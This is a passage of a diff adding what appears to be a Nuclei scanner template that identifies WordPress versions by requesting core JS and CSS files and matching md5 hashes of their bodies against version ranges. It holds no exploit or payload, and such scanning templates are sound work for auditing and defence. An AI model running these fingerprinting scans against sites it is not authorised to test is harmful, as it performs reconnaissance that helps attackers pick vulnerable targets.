"(\"a3107b7ddafb2dad47ab68d596d8617d\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"f614179d0c40cd3dea9a0b89426e70a5\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"0e672b35b6bfab72babe50424503466b\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"95137319acf4e217d0b193768155c9fa\" == md5(body))" + - type: 
dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"01cdaa40c5e6b03518b159adae2b0673\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"9a40299c0045e97780fd87af6c04ea77\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"343d63dd14ec979667d9d3a6210be95f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ae35b8b7fd84acc65690a0d13162d3b4\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"07ed58a67ed2becdbbe3657fb4da3e8e\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"2551f4595882e172dc1e6b68e8c64806\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"648f59aac0ad841a4035dc163482de5f\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"187909d84505ce345a885d0312d35081\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"4a89411639f686bd178d00573aa9dec1\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"2c2a69b51793d0f2865b705d1eaaa53c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/editor_plugin.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"21570aa6de2c615eff4eb63f2b7a6a65\" == md5(body))" + - type: dsl + name: 3.6.1 - 3.7.33 + dsl: + - "(\"a3d703f0f3b6c2171edea4410ec478b5\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"d3565905a56a8dc9268f4e2d225d8e0e\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"463fd700afb5ed294264bc16a1063375\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a19969fc41d6dbc9db112398530434ec\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a8074d90ba5bf9623345922540800eab\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"29b89850aaa6f77a7b49c2e6beb9921c\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a27f49833d720b5bc9b288a32b776831\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"d131fd47305e4d0b31657b7df4163ac7\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + 
dsl: + - "(\"dd5628adfb50edf54fe9f81e2eb9d210\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"aabd9ea9037c5fe2bb6b2007ffc196f5\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"efdcaea17aeae5a67ccd1a770d38bee0\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"14dc2e370b485d43d4c0d28ba8883b92\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"87ade361a474d9b789bd894a25b7f085\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"8caa3a7ba57a57088a1ac11cff852966\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"75d0cf576de67064ef6a66f911d3be48\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"e3bf9cd74aa73cd3383e6968a464ba28\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"4412e7acac7f4231b6c07e3a4691ebd7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"72c2441d86edf9ef1ef8fea945281db6\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"64cfe6d2916c9b29264414a55f79e038\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"e21167e2200cac86643cae38c67ace04\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"10b6fef22a3928c4b9354e7b8c38153d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6773da476c35af85238724bb65230f7d\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"b0b1e190c6972559e63acd0e4648bb87\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.2 + dsl: + - "(\"35c458d7e445b782015238656aa086ea\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"5593b5d1caa7c5902164ddd5392bff25\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"3bb1a6dc71edb4b953c6dec624b162c5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c93e26230e05d4fdd87288b47c60873f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - 
"(\"8111a8d605183b921cb237a1406afcd9\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f4ca844f37f29e43b4386ce18a0c5f43\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.33 + dsl: + - "(\"03ad629cdfa5ab6ae56233ebbcb73262\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"10e74c33a682b849626d06d7c826e8e6\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"45687c2857346504c9f1a30b53aac86f\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"a3699ee99e297be60886c6eda6ac825b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0192b04cf4169292d94cbf62519ab6ff\" == md5(body))" + - type: dsl + name: 4.9 + dsl: + - "(\"cb53c25524a16659fc1f961d507ba8bb\" == md5(body))" + - type: dsl + name: 4.9.1 - 5.0.11 + dsl: + - "(\"88f98b449b8aa12942cafd783b5aa7b5\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"875f1fdfc58ad8f9a9646cea752c5579\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b8f4f7a4ef5b0b9b56265ce6876b20f4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0bede42efd65e972891b8a927da5dc38\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"2d1d9fe235c2224f117fe901d73e8b04\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"fae67d9a9f6b3bd48515d77bbf683691\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e65885685bacc54dd952747d38dda90b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin.js" + matchers: + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"cb1aec084f3cd28d6f37990e80174863\" == md5(body))" + - type: dsl + name: 3.7.1 - 3.7.33 + dsl: + - "(\"02ed0a4f130b11ee395676d0e26171b8\" == md5(body))" + - type: dsl + name: 3.7 + dsl: + - "(\"4eb9923fe07a29b24bac1e21aaa7e6eb\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"5f51f325fb3e0b8e1737690dc96e3c9d\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - 
"(\"8b4d90c058f4f224c9c8f304d67e2dd5\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"186e45b7613323108c761faee2a1cae1\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"2be4c574071c7a785fbad50515738c77\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"40e9c12914d1afb3978286bb1140b352\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"663feb32930d3bb5cb2a438f144f9d43\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"c4c59bfbf6ac1101ee884761914d76da\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"19af2018dbb26944de552ba2df25a95c\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"3e07acce83c1bd7620680fcab0791113\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"5b140ddf0f08034402ae78b31d8a1a28\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"7b6858348aad603f95e0fde09e596870\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"27c9ee4fe976a84c4b3aa008d0a1b7fa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/editor-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"730da0a3e31cb3fd7069af78e90c150f\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.1.8 + dsl: + - "(\"5e813d95a85d8ea28d0a49ee1d043803\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"3fecc79e35495fcc9f8d89be8954afb8\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"689196d0bcdd6e580c39598b12c05943\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"bb0732eaf965130ece1b24ae7235da85\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"ae304f46f8a7284bb4da356459d1d37b\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"baf5f28f8fd531b7dc647b139e7bad19\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"f5d55bb847148c9c3bd11ad00242894f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - 
"(\"f179d2f7d136440ad6c66b3cc7a3fd7e\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"f861771d6113ddf00850eb59002f3452\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"37afbe482f103bf4838086dc55eb2abc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/editor.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"d12050e44bb9f6359fa229f7f9d51d61\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.1.8 + dsl: + - "(\"25209d7f4c896e298c193b79ec105d5d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"6807a1a2e5f6166d6387cb8e2e1a3201\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"73de2615baf27a16dd6e1894df887af8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"312bb2063162d37cc378b77f4894d54c\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"4b332eb4c9bbb5e89846330610c93727\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"431943477c661180307f94c241d650c6\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"43a4d5462bfb7fb1f6cba63b25fdcb1b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"fd68444066ed563f5ea531059d251e47\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"74b1f2dbd97fbc039cf46c3d98921eed\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9e18da2c075eefe3711b16e2ca57e3fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/dashboard.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"bee78ff276813ea4085614e738879030\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"0dc133e28d19ed6ae18702a58a335180\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"b900262c0a2aca5776dcfc19e2bec4b9\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.3.25 + dsl: + - "(\"92f93e7b1f8859c86d8577635adcd863\" == md5(body))" + - type: dsl + name: 4.0 - 4.2.2 + dsl: + - "(\"39f67345a12faf1a3c53c9289fc59f86\" == 
md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c77078371b618b99aa2bdeb82eb81473\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"3c89fd0ed1e0d37bde6d6722b815d02b\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"b7f0a17a87fc20fe83d0a7b3d97b97b0\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"d14c932322f06c464282544b020ab812\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"5fccc4199d79f8f028ff215d5f65d1ed\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"cdc52185bc346b9a55af6d5015d763cb\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"4641de29ebacfc526e739b33afbd0800\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3980aff112fb8222c364fbe4f7b88f58\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d1d46d0ff1a26493c5cebd586579ab02\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8b132ecee16938da9dd85c583d4681d9\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.1 + dsl: + - "(\"107d1144ac8c4b18346708704079b021\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"410cc788033c756935db30c728b1f63f\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"e040d11f39d268dff69edecf091f6e87\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"edea8c5146c4d778fc3a9e6f4377de4a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"bfbe016b6f0d5f009a81b38f53e4bd4d\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"1fdf9fead757cda46f53f3b79b55fe47\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"9b64d09bbbe5b190fcd535d858fb353f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6c3ea4737ae1a0f88a18b95fcd798581\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b0300165ad6c1ea5b03a6dd265636213\" == md5(body))" + - type: 
dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"334de15df8332ef1cbebbcdc105c9a90\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"97d6a50c5da4c75f433f9ed02b5de62e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2b0b4e8d23d211fac38428825e524d6a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a4f5972d11d6f587d7d01372932e97ed\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e3a87490287abc38b9801a5ab853dda9\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"10d828db9d6ba8cbd2c2567664dccd7f\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"8917960dfdd03a01d3c003f403eea83f\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"9dc196c29bce46911bb3f42c86e90586\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"51348baf610df3378679eab862ad5e55\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"7c80f6ab4c6fd0d3f4c5391a2e635780\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"7d53a09553401449f43c81877b556cad\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"a1200190c327704e2e289f9832fab738\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"9671059ae329ffb11662d51f5d1870a2\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"64206aaba162a411b337d64de20ecfea\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4650c4873e09cc55426cbe18ada6723e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6d6b42368f42527ceae8621ec731bd28\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"57c6a9490f4fcbed5358c061c1549043\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"181a0de4f1c4252aebb47f2204f0c119\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3a4f06342b20831610cd2389936d60cb\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + 
dsl: + - "(\"a7ab21eae335ce585704016628603831\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2335c2d22bc85f12e4ca34d5993e026a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"4eeb8803dcb88361aeceeeb6339a3a51\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"acb2a06d6bb17892486bb83171ab57e0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8a3c425cdc87706f0e2f30643e278348\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"197404b329a50b23b37b0fbd72b81017\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d6b102488933f7cd50d8b1b17627733e\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"d87d776863fd4e2833fd40388559908b\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"ea21d81ce5d4c547a1c13476f1274ffb\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"b13c1e5aa68a4038c1bc0582fc04d295\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"c6eafec474a03263c37fa159dd794525\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4fa7b6674dee1a9dd01fa7474baf3096\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"ed0357294791d25a02ddf53eca1c55da\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3b3696d5be809c1ae294cd0c1149431d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8a579bbb02688c923f0704ae98fcc87d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"34c98fdd54bd1ebe81fadf94002cf606\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"b34e40cefb53403bd9a8c058b7f91dd4\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"990729b33128aba139f4ca6f9c3d26db\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0b54ad0d536080b196cb3e2e1d10691b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a9b79d9be177c2ac33595ba769fcd246\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/tinymce/wp-tinymce.js" + matchers: + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"1a71eb9c2e788d1520b086939b14fdeb\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"9d2c582fe6cb12203ad0b857a029bd33\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ea8b083a18626a1affa3df8886b5a842\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"0e5309ea99cd90706a48953493e0ddef\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"459c552c4fed71b308d2fca0ed9ea37c\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"ffe71832a7c66be8b8df4640908d5166\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3cd3d82b486d5783b70ed642835b69ab\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"60a49686075ee09ee6fd6672dea7e013\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/twemoji.js" + matchers: + - type: dsl + name: 4.8.2 - 4.9.2 + dsl: + - "(\"c0390599690d05b4c11e1a8b9b0fab25\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"4405b6c3e027ec84fecf1544e6a95faf\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"be2f6b80d0307857a83d0b17b9f24d2d\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"eb1a64327a54c38aedd775a04e8e0d10\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"67bccdc7434c745aa8fcd5d9f05acdf3\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"0bc85a034468a7c4571dba2653f74fbf\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"3ee6d376cd81409dd12d29b5dfcbf385\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"c5e2468d0609ca34092c9d68466332ba\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"fc199f3337f05b3a2e6920c4b47c74d1\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"241425f7ffff6596f2d19ced513b1f0b\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - 
"(\"4d33a4ad65ec90364e2c52aca8badf11\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8a6fb9053400858374294ffde81bf81d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bdeb78768f3f5a5613495826ad543a69\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"c9e9b421239fdb7f771bfc8e8c74dd2b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b9924734a6ca248128a9a04287228257\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"deaea3bc219e50b8db06022b21a078fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/admin-menu.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"5e1349161a85839be024488a50de95b3\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b1e6ea1aee87917ff8cac7929130e61d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c9fa68152543f700153462035f04ba13\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"db41a7ad18e56aa32ac88650cf65f03f\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"cdff2ab873be887ba6f04022ec98fdcb\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"833e64b0003fc66897e82fcfc7fc0121\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"5d1b42b737158c277828afda18881573\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"3c9615f3acb53ceee8340401a7939b89\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"e866498f734c0dcf94ea834e3fe81a83\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"734bf76b45a2a690043446ededf94b7d\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"2b4eb0f12b5b5fb87f06528eb082b8a3\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"54c7805c00f9d4ee074fb60669e93fa7\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4c455ba981ec9b471c7d9b0f459470ba\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"5ac558ef6bfa6308c3da00ed4c8bd467\" 
== md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"8f492790e0bd47664cfc1267d3e4317f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b823320f18dc78ca56d7b3409a90f518\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"08154f808fde723690366d2b66237597\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/thickbox.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"805aa150a391e44e3245f25ea83bdfcb\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6d9819a66083a19b6df22de32f072586\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b904be85634530e3008e9dc4722628fb\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"255290108a1c6a8ad31f6fa1415978a7\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"87bddde1890612b32a9a4672e5d26661\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"23b4106d316474bc2a38b48a01786aac\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"b1dcb13562cf13a93d4ddf10a7c6d787\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"1b31826535373c66aeeac3fc82008024\" == md5(body))" + - type: dsl + name: 2.7.1 - 3.2.1 + dsl: + - "(\"9e2094eaecb034d8e9d3d726518aab05\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"9c2bd2be0893adbe02a0f864526734c2\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"ed2c3a3ad714f3134bc7824fadd0eeea\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"c2a19490b513519a3453915c73fa034b\" == md5(body))" + - type: dsl + name: 4.9 - 5.4.4 + dsl: + - "(\"69d6aa1f5bafc0d02da2d4470496ea12\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5dcdcf282792663175cd2c2e8ef04f6f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"37faeb50ef52da086e0f8c2c289e66d4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-nav-menus.min.css" + matchers: + - type: dsl + name: 4.8 - 
4.8.15 + dsl: + - "(\"9b59a1a32ef52f56906579bb83f2de2e\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"0567f480faf8b31d9121fa36fc2ce535\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.3 + dsl: + - "(\"50392a954a951e46177355be44c21914\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"080248c963bb67242f323af5cab56734\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"13c05456026f6c1866db7a742e27ab13\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"5c7cc163f7382233369702a73f4ee078\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"95401f95b6dd126827e64f690a9db231\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - "(\"a45b939bffb49aeb3bf6ec41d32625e4\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.1 + dsl: + - "(\"6e343b576a49ade0f56fa49dc42980af\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"fec0c0c5b8e76ffaeb87d95daa4d7e74\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.16 + dsl: + - "(\"c3d67006bc1b55274afa78df3b46f605\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"ff497c14667947cbbe75153b587405a9\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"e7fb504704cbc728b307fcef68bc40e0\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"75a99dd31bb764de27ea997e70ba8bc5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"62d2c2937b42ff6236a02a39047ac0fb\" == md5(body))" + - method: GET + path: + - 